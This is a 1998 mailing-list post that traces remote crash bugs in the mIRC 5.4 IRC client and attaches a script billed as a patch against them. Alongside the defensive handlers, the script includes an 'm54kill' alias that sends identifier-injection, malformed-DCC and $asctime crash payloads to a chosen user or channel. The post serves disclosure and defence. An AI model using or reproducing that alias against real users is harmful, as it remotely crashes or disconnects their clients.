Date: Fri, 24 Jul 1998 08:17:51 -0400
From: Derek Reynolds <[email protected]>
To: [email protected]Subject: Another NEW mIRC bug and ALL mIRC Exploit patches
--=====================_901297071==_
Content-Type: text/plain; charset="us-ascii"
History of Events: (Remote Exploits)
07/18/98 - Someone on DALnet finds problem with DCC SEND and DCC RESUME
(exploit made)
07/20/98 - $asctime bug revealed
07/21/98 - myn discovers a large problem with $calc and notices that most
scripts that
use on ctcpreply ping perform a $calc. He then implements the
$asctime bug
into on ctcpreply ping which ables a user to remotely crash the
mIRC client
07/22/98 - v9 evaluates myn's bug finding and plays with on ctcpreply some
more and finds that $calc evaluates custom alias's or functions.
07/23/98 - Some uninformed person believes that it is on IRCN native and
posts a message to rootshell.com and forgets the big picture.
Any mIRC script that makes use of the event "ON CTCPREPLY PING"
which does a $calc or any other remote/event that uses $calc is
exploitable.
Most people are only patching themselves against the $calc bug, but are
still wondering why their mIRC keeps crashing.. Its because they have not
patched themselves against the 2 other remote mIRC exploits.
Below is the patch for ALL known remote mIRC exploits.
to install it type "/load -rs m54-fix-sploits.mrc"
Peace.
myn@efnet
--=====================_901297071==_
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: attachment; filename="m54fix-sploits.mrc"
;mIRC 5.4 QuickFIX and Exploits
;myn@efnet - 07/22/98
;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98)
;DCC exploit fix
ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }
ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }
;ctcpreply ping $asctime crash and $identifier Exploit fix
;replace all instances of the event "on ctcpreply" with the one below
on 1:CTCPREPLY:PING* {
if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick | halt }
echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s)
halt
}
;And as an added bonus for all you DALnet kiddies
;This sends all known mIRC 5.4 exploits at once
alias m54kill {
if ($1) {
.ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
%ip = $rand(600000000,4294967294)
.quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
.ctcpreply $1 ping $!asctime(2147483647)
echo -a * Sent mIRC kills to $1
halt
}
echo -a * Parms [/m54kill nick/#channel]
}
--=====================_901297071==_--
